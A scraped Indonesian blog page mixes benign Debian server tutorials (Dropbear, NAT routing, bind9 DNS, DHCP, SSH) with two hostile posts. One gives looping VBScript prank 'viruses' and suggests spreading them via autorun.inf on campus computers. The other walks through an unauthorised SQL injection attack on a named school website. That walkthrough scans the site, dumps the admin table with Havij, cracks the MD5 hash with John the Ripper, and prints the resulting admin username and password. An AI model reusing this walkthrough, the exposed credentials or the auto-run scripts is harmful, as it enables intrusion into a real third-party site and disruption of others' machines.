ID Card Otaku

ID Card Otaku
ID Card Otaku
Latest Post

Cara Install Dropbear Di VPS Debian

Written By Unknown on Sabtu, 22 Maret 2014 | 08.58


Cara Install Dropbear Di VPS Debian

Jika sebelumnya Tutorial Install Dropbear Di VPS Centos 5 Dan 6
Sekarang kita mencoba install dropbear pada Debian
Langsung mulai saja Tutorial Install Dropbear Di VPS Debian
  1. Anda harus akses VPS via ROOT
  2. Buka terminal XTREM
  3. Ikuti langkah2 berikut
  4. Update dulu:
  5. apt-get update
  6. Install dropbear:
  7. apt-get install dropbear
  8. Install nano:
Jika sebelumnya sudah pernah install nano maka lewati saja langkah berikut:
apt-get install nano
Lanjut ke langkah selanjutnya
Edit config dropbear:
nano /etc/default/dropbear
Cari dan ubah:
NO_START=1
DROPBEAR_PORT=22
DROPBEAR_EXTRA_ARGS=
Menjadi:
NO_START=0
# DROPBEAR_PORT=22
DROPBEAR_EXTRA_ARGS="-p 443 -p 143 -p 109"
Tutorial Install Dropbear Di VPS Debian
Simpan dengan  CRTL+X - Y dan SAVE (ENTER)
Langkah Terakhir Restart Dropbearnya:
/etc/init.d/dropbear restart
Sudah selesai Tutorial Install Dropbear Di VPS Debian
Sekian dan terimakasih,semoga tutorial ini bermanfaat buat semuah
Kalau ada kritik,saran dan pertanyaan silahkan komentar.

Tutorial Konfigurasi Router Debian 6

Tutorial Konfigurasi Router Debian 6

Assalamualaikum Temennya Kang Ahmed :-) kali ini Kang Ahmed akan memberikan sedikit ilmu Tutorial Konfigurasi Router Debian 6. yang ane dapet dari blog temen ane hhee,,, :D, di postingan sebelumnya ane telah share tentang Konfigurasi IP Address Debian 6. dan sekarang silahkan membaca tutor konfigurasi router debian 6 !!!
Selamat membaca,,,,,, :D


Fungsi Router
Router berfungsi sebagai sebuah alat penghubung di antara rangkaian yang berlainan. Semasa paket dihantar, router akan menjalankan beberapa proses penting antaranya ialah: membuat terjemahan protokol, mengemaskini jadual haluan, mengirim paket, membungkus paket dan membuka bungkusan paket. Selain itu juga router berperanan untuk menapis trafik dengan membenarkan paket tertentu sahaja. Ini membolehkannya bertindak sebagai alat pelindung ringkas bagi rangkaian anda.

Berikut adalah beberapa kelebihan router:
1.    Menghubungkan dua atau lebih rangkaian untuk membentuk satu rangkaian
internetwork.
2.    Menghubungkan dua rangkaian yang berlainan protokol.
3.    Mengawal keselamatan rangkaian dengan membuat tapisan pada paket.



Untuk kali ini ane akan menuliskan bagaimana membuat router secara sederhana di Debian 6
Kita definisikan dahulu IP yang akan digunakan

IP untuk koneksi internet kita taruh di eth0
IP : 172.16.16.1/25
Gateway : 172.16.16.126
IP untuk local ditaruh di eth1
IP : 192.168.12.1/26

dari definisi diatas dikonfigurasikan kedalam sistem debian dengan langkah-langkah sebagai berikut:

1. Memasukkan IP di interfaces (eth) dengan perintah

#nano /etc/network/interfaces

kemudian edit filenya menjadi sebagai berikut:
# The primary network interface

auto eth0
iface eth0 inet static
address 172.16.16.1
netmask 255.255.255.128
network 172.16.16.0
broadcast 172.16.16.127
gateway 172.16.16.126
# dns-* options are implemented by the resolvconf package, if installed
dns-nameservers 172.16.16.1
dns-search smkpelitasalatiga.com
auto eth1
iface eth1 inet static
address 192.168.12.1
netmask 255.255.255.192
network 192.168.12.0
broadcast 192.168.12.63
2. Kemudian kita edit file rc.local
(digunakan untuk melakukan routing walaupun di restart) dengan perintah

#nano /etc/rc.local

sebelum baris exit 0 ditambahkan

iptables -A POSTROUTING -t nat -o eth0 -j MASQUERADE

sehingga rc.local akan menjadi
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

iptables -A POSTROUTING -t nat -o eth0 -j MASQUERADE
exit 0
Kemudian isi konfigurasi pada /etc/network/option
Isikan baris :
ip_forward = yes
spoofprotect = yes
syncookies = no

3. Aktifkan ip forward
dengan perintah
#nano /etc/sysctl.conf

cari kata #net.ipv4.ip_forward=1
kemudian hilangkan tanda #

4. Restart network
perintah
#/etc/init.d/networking restart

5. Setting DNS
perintah
# nano /etc/resolv.conf
tambahkan nameserver berikut :
nameserver 8.8.8.8
nameserver 8.8.4.4
Jika sudah restart PC Router dengan perintah reboot

Untuk mengecek konfigurasi Router kita coba melewati client dengan cara ping lewat CMD
Setting IP Client menjadi
ip address 192.168.12.2
netmask 255.255.255.192
gateway 192.168.12.1
Kemudian buka CMD dan ketikan :
1. ping 192.168.12.1 dan ping 172.16.16.126
Jika reply maka konfigurasi berhasil
2. ping google.com
jika reply maka konfigurasi berhasil

 Sumber !!!
Sampai disini dulu tutor "Tutorial Konfigurasi Router Debian 6" dari Kang Ahmed, semoga dapat membantu kalian yang sudah membaca tentunya, hhe...
Mohon maaf bila ada kata kata yang kurang enak di baca maupun di dengar.

Bila ada yang tidak di mengerti di tutor ini silahkan komen saja di tempat yang telah di sediakan, atau bisa langsung ke tanya ke ane, lewat email "kangahmed1@gmail.com" atau ke temen ane yang satu ini "facebook" bang faldy

Tutorial Konfigurasi DNS di Debian 6

Tutorial Konfigurasi DNS di Debian 6

Assalamualaikum Temennya Kang Ahmed :-) kali ini Kang Ahmed akan memberikan sedikit ilmu Bagaimana Konfigurasi DNS Server di Debian 6 . ini artikel ane dapet dari blog temen ane hhee,,, :D, di postingan sebelumnya ane telah share tentang Tutorial Konfigurasi DHCP di Debian 6 dan Tutorial Konfigurasi SSH di Debian 6.



Sedikit review untuk pengertian dari DNS .

DNS adalah singkatan dari Domain Name System, DNS itu adalah nama sebuah sistem database yang dibuat untuk memenuhi kebutuhan komputer, layanan atau sumber daya yang terhubung ke jaringan internet atau jaringan komputer pribadi.

Fungsi DNS adalah menerjemahkan nama domain (contoh: www.google.com) menjadi IP address (74.125.93.105), kita tentu lebih mudah mengingat nama domain suatu situs dibandingkan IP address-nya bukan ? nah itulah kegunaan DNS. Jadi ketika anda mengetikkan nama domain suatu situs di browser anda lalu menekan enter, browser anda akan mengecek apakah nama domain tersebut ada di cache DNS browser anda (pernah anda buka situsnya sebelumnya), jika tidak browser anda tersebut akan menghubungi name server (server tempat DNS berada) yang digunakan oleh koneksi internet anda untuk kemudian menerjemahkan nama domain situs tersebut menjadi IP address, kalau ketemu maka anda akan dibawa ke lokasi server tempat halaman situs tersebut berada.


Kita lanjut ke penginstallan DNS di Debian 6.0.5

1) apt-get install bind9
2) cd /etc/bind
3) nano named.conf.local
zone "ahmad.com" {
type master;
file "/etc/bind/db.ahmad";
};

zone "12.168.192.in-addr.arpa" {
type master;
file "/etc/bind/db.192";
};

ketik semua peritah diatas
kemudian save dengan CTRL+X lalu Y kemudian ENTER


4) cp db.local db.ahmad
5) cp db.127 db.192
6) nano db.ahmad
;
; BIND data file for local loopback interfaces
;
$TTL 604800
@ IN SOA server.ahmad.com. server.ahmad.com. (
2 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS server.ahmad.com.
@ IN A 192.168.12.2

server IN A 192.168.12.2


* Jangan ubah/hapus baris yang lain.
save dengan CTRL+X lalu Y kemudian ENTER

9) nano db.192
@ IN SOA server.ahmad.com. server.ahmad.com. (
1 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS server.ahmad.com
2 IN PTR server.ahmad.com

* Jangan ubah/hapus baris yang lain.
save dengan CTRL+X lalu Y kemudian ENTER

10) nano /etc/resolv.conf

nameserver 192.168.12.2
nameserver 8.8.8.8


save dengan CTRL+X lalu Y kemudian ENTER

11) /etc/init.d/bind9 restart

* Kalau failed atau error coba cek setting dari awal kemungkinan ada kesalahan
jika success berarti anda berhasil mengkonfigurasi DNS nya.

Cara mengeceknya dengan menggunakan perintah nslookup di CMD client dan sebelumnya DNS Primary client harus 192.168.12.2


Sumber

Sampai disini dulu tutor "Tutorial Konfigurasi DNS Server di Debian 6 " dari Kang Ahmed, semoga dapat membantu kalian yang sudah membaca tentunya, hhe...
Mohon maaf bila ada kata kata yang kurang enak di baca maupun di dengar.

Bila ada yang tidak di mengerti di tutor ini silahkan komen saja di tempat yang telah di sediakan, atau bisa langsung ke tanya ke ane, lewat email "kangahmed1@gmail.com" atau ke temen ane yang satu ini "facebook" bang faldy

Cara Remote Debian Menggunakan Putty

Cara Remote Debian Menggunakan Putty

Assalamualaikum Temennya Kang Ahmed :-) gimana kabarnya ??? udah lamanih ane engga update blog ini, tapi jangan sedih karena kali ini Kang Ahmed akan memberikan sedikit pengetahuan Cara menghubungkan putty ke debian.

 Apa itu Putty ? Putty adalah software remote console/ terminal yang digunakan untuk buat remote connection komputer melalui Port SSH atau sebagainya. tapi kali ini kita akan coba meremote os Debian, sesuai permintaan temen ane (Ali) yang kemarin2 ngrequest lewat komenan di salah satu artikel di blog ini.
udah cukup ya basa basinya :D, langsung aja kita ke TKP let's go !!!



1. Buka dulu os debian yang ada di virtual kalian. (yang pasti os virtual sama os aslinya
   udah terhubung).

2. Setelah di buka, jangan lupa login sebagai SU (Super User) / root.

3. Sekarang buka Puttynya, dan masukan IP Adress dan Portnya, di sini ip ane adalah
    192.168.10.10 dan portnya 69. biar lebih jelas lihat gambar di bawah ini.



4. Bila berhasil maka akan muncul tampilan seperti di bawah, dan masukan
    username/password debian kalian.



5. Taraaaaa sekarang kalian udah berhasil, meremote debian dengan putty.



Belum selesai agan-agan masih ada sedikit informasi mengenai "Port"nya, tadi kan ane pake port 69, sedangakan port defaultnya adalah 22.
Nah bagaimana cara kita mengubah portnya ???
 yang pertama kita buka debiannya, dan jangan lupa kita di posisi root.
lalu edit ssh dengan mengetikan :  nano /etc/ssh/sshd_config
setelah masuk menu editor lalu cari kata "Port" dan ganti angkanya sesuai kemauan kalian. lihat gambar berikut bila masih bingung :

  
Sudah jelaskan.
Sekarang kita restart sshnya dengan mengetikan : /etc/init.d/ssh restart
dan selamat kalian telah bisa mengubah portnya :D.
Sampai disini dulu tutor "Cara Remote Debian Menggunakan Putty" dari Kang Ahmed, semoga dapat membantu kalian yang sudah membaca tentunya, hhe...
Mohon maaf bila ada kata kata yang kurang enak di baca, serta kesalahan dalam mengetik (kurang hurufnya), hhe... maklum masih newbie jadi kita sama sama belajar aja :-D

Bila ada yang tidak di mengerti di tutor ini silahkan komen saja di tempat yang telah di sediakan, atau bisa langsung ke tanya ke ane, lewat email "kangahmed1@gmail.com"

Tutorial Konfigurasi DHCP di Debian 6

Tutorial Konfigurasi DHCP di Debian 6

Assalamualaikum Temennya Kang Ahmed :-) kali ini Kang Ahmed akan memberikan sedikit ilmu Konfigurasi SSH di Debian 6. yang ane dapet dari blog temen ane hhee,,, :D, di postingan sebelumnya ane telah share tentang Tutorial Konfigurasi SSH di Debian 6 dan Tutorial Konfigurasi Router Debian 6. kali ini ane akan memberikan Tutorial Konfigurasi DHCP di Debian 6, langsung saja lihat langkah-langkahnyah :


Sedikit pengertian tentang DHCP (Dynamic Host Configuration Protocol) digunakan untuk melayani request Ip Address dari client. Gunanya adalah, kita tidak perlu lagi repot-repot mengkonfigurasi Ip pada computer, sebut saja Zero Configuration. Client akan meminta Ip Address pada server, kemudian server akan memberikan alokasi ip yang tersisa.

Lanjut install DHCP di Router Debian 6.0.5
# apt-get install dhcp3-server

Setiap kali installasi dhcp server, akan muncul pesan failed. Hal ini dikarenakan, Ip Address kita tidak cocok dengan Ip Address pada file konfigurasi Default dhcp3-server. Biarkan saja, nanti akan normal sendiri.


Sekarang konfigurasi DHCP agar bisa digunakan oleh Client
# nano/etc/dhcp/dhcpd.conf

Beri tanda “#” pada semua baris. Kecuali baris script di bawah ini. Sesuaikan alokasi ip dengan topologi jaringan.
#. . .
# A slightly different configuration for an internal subnet.
subnet 192.168.12.0 netmask 255.255.255.192 {
range 192.168.12.10 192.168.12.20;
option domain-name-servers smkpelitasalatiga.com;
option domain-name "smkpelitasalatiga.com";
option routers 192.168.12.1;
option broadcast-address 192.168.12.31;
default-lease-time 600;
max-lease-time 7200;
}
#. . .
save dan exit dengan ctrl+x lalu y dan Enter

Jika terdapat 2 atau lebih interface nya ( LAN Card ) kita setting DHCP nya sesuai dengan Interface yang digunakan. Disini ane menggunakan eth1 sebagai DHCP nya .
# nano /etc/default/isc-dhcp-server
# On what interfaces should the DHCP server (dhcpd) serve DHCP requests?
# Separate multiple interfaces with spaces, e.g. "eth0 eth1".
INTERFACES="eth1"
Jika sudah kita exit dan save ctrl+x lalu y dan Enter

Setelah semua selesai kita restart DHCP nya dengan cara
# /etc/init.d/isc-dhcp-server restart

Kemudian test di client untuk mengkosongkan konfigurasi IP Addressnya agar diberi oleh Router Debiannya.

 Sumber !!!
 
Sampai disini dulu tutor "Tutorial Install DHCP di Debian 6" dari Kang Ahmed, semoga dapat membantu kalian yang sudah membaca tentunya, hhe...
Mohon maaf bila ada kata kata yang kurang enak di baca maupun di dengar.

Bila ada yang tidak di mengerti di tutor ini silahkan komen saja di tempat yang telah di sediakan, atau bisa langsung ke tanya ke ane, lewat email "kangahmed1@gmail.com" atau ke temen ane yang satu ini "facebook" bang faldy

Tutorial Konfigurasi SSH di Debian 6

Tutorial Konfigurasi SSH di Debian 6

Assalamualaikum Temennya Kang Ahmed :-) kali ini Kang Ahmed akan memberikan sedikit ilmu Konfigurasi SSH di Debian 6. yang ane dapet dari blog temen ane hhee,,, :D, di postingan sebelumnya ane telah share tentang Konfigurasi IP Address Debian 6 dan Tutorial Konfigurasi Router Debian 6. kembali ke topik semula, kali ini Kang Ahmed akan memberikan tutorial Konfigurasi SSH di Debian 6, langsung saja kita ke TKP ???




Install dengan perintah
# apt-get install ssh

Setelah aplikasi terinstall, layanan SSH Server sudah langsung bisa kita gunakan melalui port default 22. Jika ingin mengkonfigurasi SSH Server tersebut, edit file sshd_config yang merupakan file konfigurasi utama pada SSH Server. Dalam file tersebut, kita bisa merubah settingan default yang ada.
Misalnya merubah port default, ataupun menambah tampilan banner ssh agar menjadi lebih menarik.

Merubah Port Default SSH
Edit file sshd_config berikut, kemudian cari dan rubah satu baris konfigurasi script di bawah ini.
# nano /etc/ssh/sshd_config
# What ports, IPs and protocols we listen for
#Port 21 #port default ssh
Port 354 #port diganti ke 354


Modifikasi tampilan login SSH
Bosan dengan tampilan awal LogIn pada system Debian melalui SSH yang itu-itu aja?? Tenang, ane punya solusinya, Anda bisa melakukan sedikit konfigurasi untuk merubah tampilan banner SSH menjadi lebih menarik. Terlebih dahulu install aplikasi tambahan untuk membuat Banner default yang berupa Huruf menjadi bentuk Grafiti.

# apt-get install figlet
# figlet DebianServer ver.Squeeze > /etc/ssh/banner


Dan tambahkan script berikut pada file sshd_config.
# echo “banner /etc/ssh/banner” >> /etc/ssh/sshd_config


Setiap selesai mengkonfigurasi, restart service ssh agar semua konfigurasi dijalankan langsung.
# /etc/init.d/ssh restart

Setelah sudah dikonfigurasi dan di restart SSH nya . Kita test melalui client dengan menggunakan software Putty .
Anda bisa mendownload Putty disini Download Putty
Setelah didownload anda buka Putty lalu masukan IP Address Server/Router yang ingin diremote dan masuk Port nya sesuai dengan settingan SSH nya kemudian klik Open dan Login Username dan Password Server/Routernya.

Di postingan berikut ane akan bahas tentang DHCP dan DNS Server !!!

 Sumber !!!
Sampai disini dulu tutor "Tutorial Install SSH di Debian 6" dari Kang Ahmed, semoga dapat membantu kalian yang sudah membaca tentunya, hhe...
Mohon maaf bila ada kata kata yang kurang enak di baca maupun di dengar.

Bila ada yang tidak di mengerti di tutor ini silahkan komen saja di tempat yang telah di sediakan, atau bisa langsung ke tanya ke ane, lewat email "kangahmed1@gmail.com" atau ke temen ane yang satu ini "facebook" bang faldy

Membuat Virus Genit


Membuat Virus Genit



Kali ini saya akan membagi-bagikan sebuah keisengan brow.. ya keiseng-isengan tapi tenang aja gak begitu berbahaya ko' cuma sedikit bikin dag-dig-dug-der aja hahaaa.. Penasarankan apa..? yupz, sesuai dengan judulnya yaitu Membuat Virus Genit, saya akan membagi-bagikan ilmunya ni brow.. simak baik-baiknya sob..

Caranya: Buka notepad dan masukkan code berikut,


do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop


Simpanlah dengan file tadi dengan ekstensi file iseng.vbs ato apapun nama kesukaan asalkan pastikan ekstensinya .vbs, dan jalankan filenya ( Klik 2x), perhatikan CD/DVD ROM akan terbuka/tertutup dengan sendirinya tanpa henti, hahahaaaaa...

Tapi jangan kawatir brow.. ni ane kasih solusinye.. cara menghentikan aksi Virus Nakal ini ialah dengan menekan tombol CRTL+ALT+DEL dan matikan proses wscripts.exe, Kalo mau keren lagi, masukkan ke file autorun.inf di flashdisk anda, jadi setiap loe colokin ke kompie kampus, maka akan otomatis dijalankan “Virus” Nakal ini.(Baikan brow ane ni...? heheee)

Nah mau script .vbs yang laen lagi..? ni ane kasih dah scriptnya lagi.. 


WScript.Sleep 18000 WScript.Sleep 1000 do Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "notepad" WScript.Sleep 100 WshShell.AppActivate "Notepad" WScript.Sleep 500 WshShell.SendKeys "H" WScript.Sleep 500 WshShell.SendKeys "a" WScript.Sleep 500 WshShell.SendKeys "l" WScript.Sleep 500 WshShell.SendKeys "o" WScript.Sleep 500 WshShell.SendKeys ". " WScript.Sleep 500 WshShell.SendKeys "a" WScript.Sleep 500 WshShell.SendKeys "p" WScript.Sleep 500 WshShell.SendKeys "a" WScript.Sleep 500 WshShell.SendKeys " " WScript.Sleep 500 WshShell.SendKeys "k" WScript.Sleep 500 WshShell.SendKeys "a" WScript.Sleep 500 WshShell.SendKeys "b" WScript.Sleep 500 WshShell.SendKeys "a" WScript.Sleep 500 WshShell.SendKeys "r" WScript.Sleep 500 WshShell.SendKeys "?" WScript.Sleep 500 WshShell.SendKeys " " WScript.Sleep 500 WshShell.SendKeys "K" WScript.Sleep 500 WshShell.SendKeys "a" WScript.Sleep 500 WshShell.SendKeys "b" WScript.Sleep 500 WshShell.SendKeys "a" WScript.Sleep 500 WshShell.SendKeys "r" WScript.Sleep 500 WshShell.SendKeys " " WScript.Sleep 500 WshShell.SendKeys "b" WScript.Sleep 500 WshShell.SendKeys "a" WScript.Sleep 500 WshShell.SendKeys "i" WScript.Sleep 500 WshShell.SendKeys "k" WScript.Sleep 500 WshShell.SendKeys "?" WScript.Sleep 500 wscript.sleep 5000 loop


Scripts diatas nanti otomatis buka notepad dan ketik: Halo. apa kabar? kabar baik? ingat yah simpan dengan ekstensi nama .vbs, klik file–>save as. lebih kurang begini gambarnya 

 
Kode Vbs ini akan membuat user terus mengetikkan kata2 “Kamu emang jelek koq!”


Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "Kamu emang jelak koq!" loop
 
Dan membuat terus menerus menekan tombol “Enter”

Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop
Terus tekan backspace:

MsgBox "Balik lagi ah...saltik" Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}" loop

Sumber :http://maubacabaewis.blogspot.com/2013/06/membuat-virus-genit.html


kalau sobat males atau ga tau cara copasnya. download ajah disini 

Belajar Hacking Website Untuk Pemula


Belajar Hacking Website Untuk Pemula


Pengenalan Hacking


Hacking merupakan sebuah seni yang bisa di bilang mempunyai kedua kekuatan antara white hacking dan black hacking, antara seni berbuat baik dan seni berbuat jahat. Pada dasarnya hacking itu bertujuan untuk menemukan sesuatu kelemahan pada sebuah system atau aplikasi agar kita dapat membongkar source code di dalam system tersebut dan berhasil masuk ke dalam system tersebut. Pada dasarnya kita dapat merubahnya namun kita tidak untuk merusak. Kali ini kita akan mencoba membongkar sebuah keamanan website dengan menggunakan teknik vuln system kelemahan dengan SQL injection.

Belajar hacking website dari nol anda akan di arahkan bagaimana anda yang awalnya tidak tahu tentang dunia hacking. Dengan membaca e-book network security ini anda dalam waktu 1 jam saja mampu menjadi seorang hacker dan mampu melumpuhkan sebuah website dengan menganalisa dan menerobos system kelemahannya.

Banyak kasus hacking yang beredar dan terkenal sampai saat ini salah satunya adalah hacker cina yang berhasil men take over satelit NASA selama kurang dari 15 menit. Selain itu situs-situs besar seperti google, facebook, amazon, ebay juga pernah kebobolan system keamanan mereka.

Keamanan memang merupakan salah satu factor terpenting dalam sebuah system atau aplikasi karena dengan keamanan, system atau aplikasi yang kita buat dapat bertahan lama. Bukan berate system atau aplikasi kita sempurna karena tidak ada sebuah system atau aplikasi yang sempurna 100%. Tujuan dari keamanan adalah memperlama hacker merusak dari system atau aplikasi anda hingga berpuluh-puluh tahun. Hacking memang memanfaatkan sebuah system misalnya pada jaringan, yang akan kita bahas kali ini adalah hacking website dengan mencari vuln keamanan. Attacker : Penyerang.
Korban : Sistem yang akan di serang.
Firewall : Sistem pelindung dari website.

Di mana attacker mencoba akan menyerang korban dengan teknik vuln pada sebuah website yang di miliki korban. Dengan memanfaatkan celah firewall website tersebut dan berhasil menerobos sampai halaman admin.


Pengenalan Software 

1.1 Acunetix
Acunetix merupakan sebuah program alat scaning website yang sangat popular di dunia hacking. Kemampuannya untuk menscan secara total dari sebuah system dan mendapatkan sebuah informasi secara mendetail. Acunetix ini juga bisa mendeteksi kelemahan pada system aplikasi pada website, seperti vuln pada SQL Blind, SQL Injection, Cross Sire Scripting (XSS). Dan dari acunetix ini mampu melihat isi directori dari sebuah website dan bisa di gunakan untuk mencari halaman login website tertentu. Kemampuannya yang begitu lengkap acunetix menjadi salah satu software favorite dari para hacker saat ini. Saat ini acunetix sudah mencapai versi 8 dan dapat di gunakan di windows xp, vista, 7 dan windows 8.
Download : http://www.4shared.com/rar/nlFJj71b/Acunetix.html

1.2 John The Ripper
John The Ripper merupakan salah satu alat hack paling popular dan paling lama yang bertahan sampai saat ini. John di gunakan untuk mencrack sebuah password yang sudah di descyript dari md5 hash, md4, dan password binary lainnya menjadi password login bisaa. Namun untuk menjalankan John anda perlu selalu meng-update source list password directory agar saat mendescyript password terbantu dengan cepat namun john dapat membaca cepat anatar 1-7 password dalam hitungan menit. Namun jika password tersebut lebih dari 7 karakter dan karakter tersebut terdiri dari beberapa symbol, John akan lama membacannya butuh waktu berjam-jam bahkan berhari-hari. Download : http://www.4shared.com/zip/uvg9GqSx/John_The_Ripper.html

1.3 Havij 1.15 Pro
Havij 1.15 Pro merupakan alat pembaca isi dari daleman suatu database dengan havij kita bisa mendapatkan informasi database baik itu menggunakan sql, oracle, ms access, postgre sql, sybase. Havij sendiri memang tools hacking yang simple dan mudah di gunakan, selain itu di havij mempunyai fitur simpan yang di gunakan untuk penyimpanan dump sql yang kita dapatkan dari proses hacking.
Download : http://www.4shared.com/rar/VNv0xeAv/Havij_115_ProCrack.html

1.4 Admin Finder versi Network Security
Admin finder berfungsi untuk menemukan suatu halaman login dari sebuah website. Admin finder ini telah di modifikasi dan sudah ada tambahan source list halaman login dari sebuah website baik itu menggunakan php, asp, cfm. Tools ini memang cepat dalam melakukan scaning web login pada suatu web.
Download : http://www.4shared.com/rar/qiOrYXaS/Admin.html

1.5 Active Perl
Active perl bahasa pemograman yang cukup popular saat ini, bahasa pemograman ini banyak di kembangkan untuk pembuatan tools-tools security dan tools hacking.
Download : http://www.activestate.com/activeperl/downloads

1.6 Perl
Perl ini sama seperti active perl hanya saja perl ini untuk menjalankan program- program yang berekstensi .pl seperti adminfinder.pl. Selain itu perl ini anda bisa membuat pemograman yang berbasis pemograman perl.
Download : http://www.activestate.com/activeperl/downloads



Mencari Informasi Target 

Untuk target yang kita lakukan testing keamanan adalah website salah satu sekolahan di Indonesia dengan domain menggunakan .sch.id. Target sekolah ini di ambil untuk pembelajaran karena lemahnya system keamanan pada website tersebut. Di publikasikan untuk pembelajaran bukan untuk merusak sebuah system.
Target : http://smpn18bkl.sch.id
Untuk scanning gunakan alat : Acunetix
Untuk pengambilan dumping password admin gunakan : Havij
Untuk memecah descyript md5 password admin menggunakan : John The Ripper
Untuk menemukan halaman login menggunakan : Adminfinder versi Network Security 



Penggunaan Acunetix 


Masuk ke acunetix lalu masukan nama website seperti contoh di bawah ini :
Masukan nama websitenya pada kolom website url, seperti gambar di atas dan lalu selanjutnya pilih tombol next.
Selanjutnya akan tampil gambar seperti di bawah ini :
Biarkan sajah defaultnya seperti itu, lalu klik tombol next.

Selanjutnya adalah informasi target korban seperti server, operating system, web server, pemograman technologies yang di gunakan oleh korban akan terekam di sini :
Lalu klik tombol next.

Tampilan selanjutnya adalah informasi login biarkan sajah default seperti bawaan :
Lalu pilih tombol next.
Jika sudah akan muncul tampilan finish dan siap melalukan scanning di acunetix dan biarkan acunetix men-scan website korban hingga selesai.

Untuk additional host dectected biarkan sajah, bila ada subdomain dari web utama misalnya http://a.smpn18bkl.sch.id bisa anda centang, berhubung dari website korban tidak mempunyai sub domain anda biarkan sajah.
Selanjutnya pilih tombol finish.

Selanjutnya dari data korban kita menangkap adanya sebuah vuln blind sql yang dapat kita serang kita menemukan
http://smpn18bkl.sch.id/berita.php?p=lengkap&id=1'
Tampak gambar


Kita dapatkan dari hasil scanner menggunakan acunetix

Pada awalnya yang mempunyai blind sql injection adalah pada website
http://smpn18bkl.sch.id/berita.php?id=-1
Lihat seperti pada gambar di atas

(*) Catatan : Bagi anda yang menemukan web lain yang bertuliskan "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near" berate website tersebut bisa di dump dengan havij.

Dari hasil scanning di atas dapat di simpulkan bahwa website tersebut memunyai banyak celah untuk di trobos systemnya termasuk dengan sql injection dan juga xss. 




Penggunaan Havij 


Masuk ke havij gunakan alamat yang kita serang tadi bisa menggunakan http://smpn18bkl.sch.id/berita.php?id=-1 atau yang telah saya trobos lebih dalam lagi
http://smpn18bkl.sch.id/berita.php?p=lengkap&id=1'

hilangkan tanda – untuk yang pertama dan ‘ untuk yang kedua dan tampak seperti di gambar untuk sql injection menggunakan havij
Lalu setelah memasukan web url klik analyze tunggu sampai selesai.

Setelah selesai anda buka menu info dan klik get dan tunggu hingga selesai, jika selesai maka informasi yang kita dapatkan adalah

Target:
http://smpn18bkl.sch.id/berita.php?p=lengk
ap&id=1' Host IP: 49.156.21.35
Web Server: Apache
Powered-by: PHP/5.2.17
DB Server: MySQL Resp. Time(avg): 128 ms

Pertama-tama adalah klik get dbs untuk mendapatkan nama database, selanjutnya adalah Untuk mencari tables anda centang table smpn18bk_base klik get tables setelah itu maka akan muncul tables lebih detail lihat gambar.


Hasil keseluruhan isi database :
siswa
profil
pengumuman
pegawai
_str
nilai
apel
kelas
kategori_galeri
kategori_berita
kaldik guru_staf
galeri buku tamu
berita
agenda
admin

Setelah itu kita centang tables admin lalu klik get coloums untuk mendapatkan username, password, id dan setelah itu akan muncul password dalam bentuk md5, username, id centang semua dan klik get data.

Hasil dari gambar dump tables admin tersebut dari havij
Dan dapat hasil sebagai berikut
Username : admin
Password dalam bentuk md5 : 25f9e794323b453885f5181f1b624d0b 




Penggunaan Admin Finder 


Selanjutnya adalah bagimana kita bisa menemukan halaman login website tersebut, kita bisa menggunakan admin finder atau pun dari acunetix di atas sudah bisa melihat halaman login. Namun untuk lebih mengetahui admin finder ini anda bisa mencobanya.
Sebagai tutorial saya menaruh admin finder di directori
C:\Pentest\tools\admin
Adminfinder.pl

Lalu buka cmd dengan perintah berikut dan pastikan perl anda sudah terinstall dengan baik. Dan lihat gambar di bawah ini untuk penggunaan.
Setalah adminfinder.pl tekan enter dan akan muncul perintah seperti di bawah ini, itu merupakan adminfinder.pl yang siap anda gunakan untuk mencari halaman login.

(*) nb : untuk tempat file adminfinder anda bisa merubahnya sesuai dengan keingin anda pastikan berada dalam disk C
Setelah itu masukan nama website target www.smpn18bkl.sch.id dan tekan enter setelah itu ketik php dan tekan enter. Selanjutnya tools ini akan mencari halaman admin secara otomatis.
Carilah yang found berate itulah halaman login website dari target. Lihat
gambar selanjutnya untuk melihat found login dari website target.
Itulah halaman found dari admin

Saya membuka dengan alamat http://smpn18bkl.sch.id/admin/login.php maka akan terbuka menu login dari website tersebut.
Selanjutnya adalah crack password md5 dengan john the ripper. 




Penggunaan John The Ripper 


Selanjutnya dalah penggunaan john the ripper di mana kita sudah dapatkan password dari md5 dari vuln sql injection yang berhasil di baca dengan software havij yakni

25f9e794323b453885f5181f1b624d0b sebelum kita memulai aksi penggunaan john the ripper pastikan kita membuat sebuah fle .txt pada folder john semua akan di bahas pada gambar-gambar di bawah ini.

Pertama-tama masuk ke folder john dan masuk ke directori run lalu buat file bernama hash.txt (*) bn bisa di ubah dengan nama file lainnya.
Selanjutnya isi file tersebut dengan md5 hash yang kita dapatkan dari havij sebelumnya tambahkan 1: pada awal. Jika banyak password pada saat dumping kita bisa menggunakan 2: 3: dan seterusnya contoh:
1: 25f9e794323b453885f5181f1b624d0b
2: 25f9e794323b453885f5181f1b624d0a
3: 25f9e794323b453885f5181f1b624d0c

Lihat di gambar berikut :

Lalu kita save.

Selanjutnya buka command promt (cmd)
Cd C:\Pentest\passwords\john\run itu adalah folder directori yang saya taruh untuk menempatkan john. Yakni di folder C:\Pentest\passwords

Selanjutnya dalah jalankan john dengan perintah
John –format=raw-md5 hash.txt lihat gambar lebih detail
Yang bertanda merah adalah password login asli sebelum di md5 yakni 123456789 Berate dapat kita simpulkan login dari website target adalah :
Username : admin
Password : 123456789

Hacking System

Selanjutnya dalah hacking system kita dapat melihat isi dalaman dari website korban, ingat jangan untuk di ubah sekali lagi kita hanya untuk memperingati kelemahan pada website korban bukan untuk merusak !!!

